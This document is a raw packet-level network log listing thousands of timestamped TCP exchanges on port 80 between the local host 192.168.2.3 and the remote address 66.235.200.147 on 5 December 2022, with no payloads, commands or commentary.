Dec 5, 2022 01:32:37.890506983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890528917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890552044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890568972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890578985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890614033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890628099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890657902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890671968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890698910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890712023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890742064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890758991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890783072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890801907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890824080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890834093 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890866995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890880108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890928984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890940905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890969992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890990973 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891011953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891035080 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891052961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891064882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891094923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891109943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891139984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891155005 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891181946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891200066 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891222954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891237020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891268015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891285896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891309023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891329050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891350985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891364098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891392946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891410112 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891434908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891450882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891477108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891495943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891519070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891530991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891561031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891575098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891604900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891618967 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891645908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891664982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891688108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891707897 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891730070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891742945 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891772032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891787052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891814947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891832113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891855955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891875029 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891899109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891911030 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891942024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.891958952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.891983986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892003059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892026901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892038107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892070055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892086029 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892127037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892142057 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892168999 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892193079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892210007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892225981 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892252922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892265081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892294884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892313004 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892337084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892358065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892379045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892389059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892422915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892436028 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892463923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892483950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892504930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892518044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892548084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892565012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892589092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892612934 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892631054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892638922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892673016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892688036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892714977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892731905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892759085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892770052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892802000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892818928 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892843962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892884970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892888069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892913103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.892925978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892967939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.892983913 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893008947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893028021 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893050909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893059969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893095016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893110991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893138885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893155098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893179893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893220901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893237114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893261909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893280029 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893301964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893313885 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893343925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893362045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893385887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893398046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893429995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893444061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893471956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893488884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893512964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893527031 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893556118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893570900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893598080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893620968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893640995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893654108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893683910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893701077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893726110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893743038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893768072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893785954 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893810034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893824100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893851995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893867970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893893957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893914938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893938065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893945932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.893980026 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.893995047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894021988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894049883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894063950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894078970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894109011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894124031 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894150972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894171000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894191980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894203901 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894233942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894251108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894280910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894299030 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894323111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894340992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894364119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894386053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894407034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894414902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894449949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894462109 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894491911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894507885 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894534111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894551039 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894575119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894593954 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894615889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894629955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894659042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894664049 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894701958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894714117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894745111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894761086 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894788027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894804001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894830942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894848108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894872904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894887924 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894927979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894961119 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.894968987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.894996881 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895010948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895035982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895055056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895071983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895096064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895117044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895140886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895152092 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895183086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895200968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895224094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895248890 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895266056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895277023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895308018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895323992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895359993 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895376921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895382881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895406008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895421982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895426035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895451069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895452023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895452023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895473003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895484924 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895494938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895518064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895518064 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895518064 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895541906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895548105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895565987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895576000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895590067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895601988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895612955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895634890 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895636082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895634890 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895662069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895665884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895684004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895690918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895705938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895730019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895747900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895747900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895750999 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895772934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895785093 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895785093 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895795107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895817995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895819902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895819902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895839930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895849943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895863056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895875931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895885944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895908117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895908117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895908117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895932913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895936012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895955086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895961046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.895977020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.895987034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896001101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896022081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896043062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896064043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896069050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896086931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896110058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896116972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896131992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896155119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896163940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896163940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896176100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896198988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896203995 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896203995 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896222115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896234035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896245956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896265984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896265984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896267891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896291971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896292925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896312952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896316051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896334887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896338940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896358013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896363020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896380901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896389961 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896404028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896415949 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896429062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896450043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896456957 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896456957 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896472931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896495104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896498919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896498919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896517992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896528959 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896541119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896563053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896562099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896563053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896584988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896590948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896608114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896630049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896637917 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896637917 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896652937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896667004 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896675110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896698952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896708965 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896708965 CET	49705	80	192.168.2.3	66.235.200.147
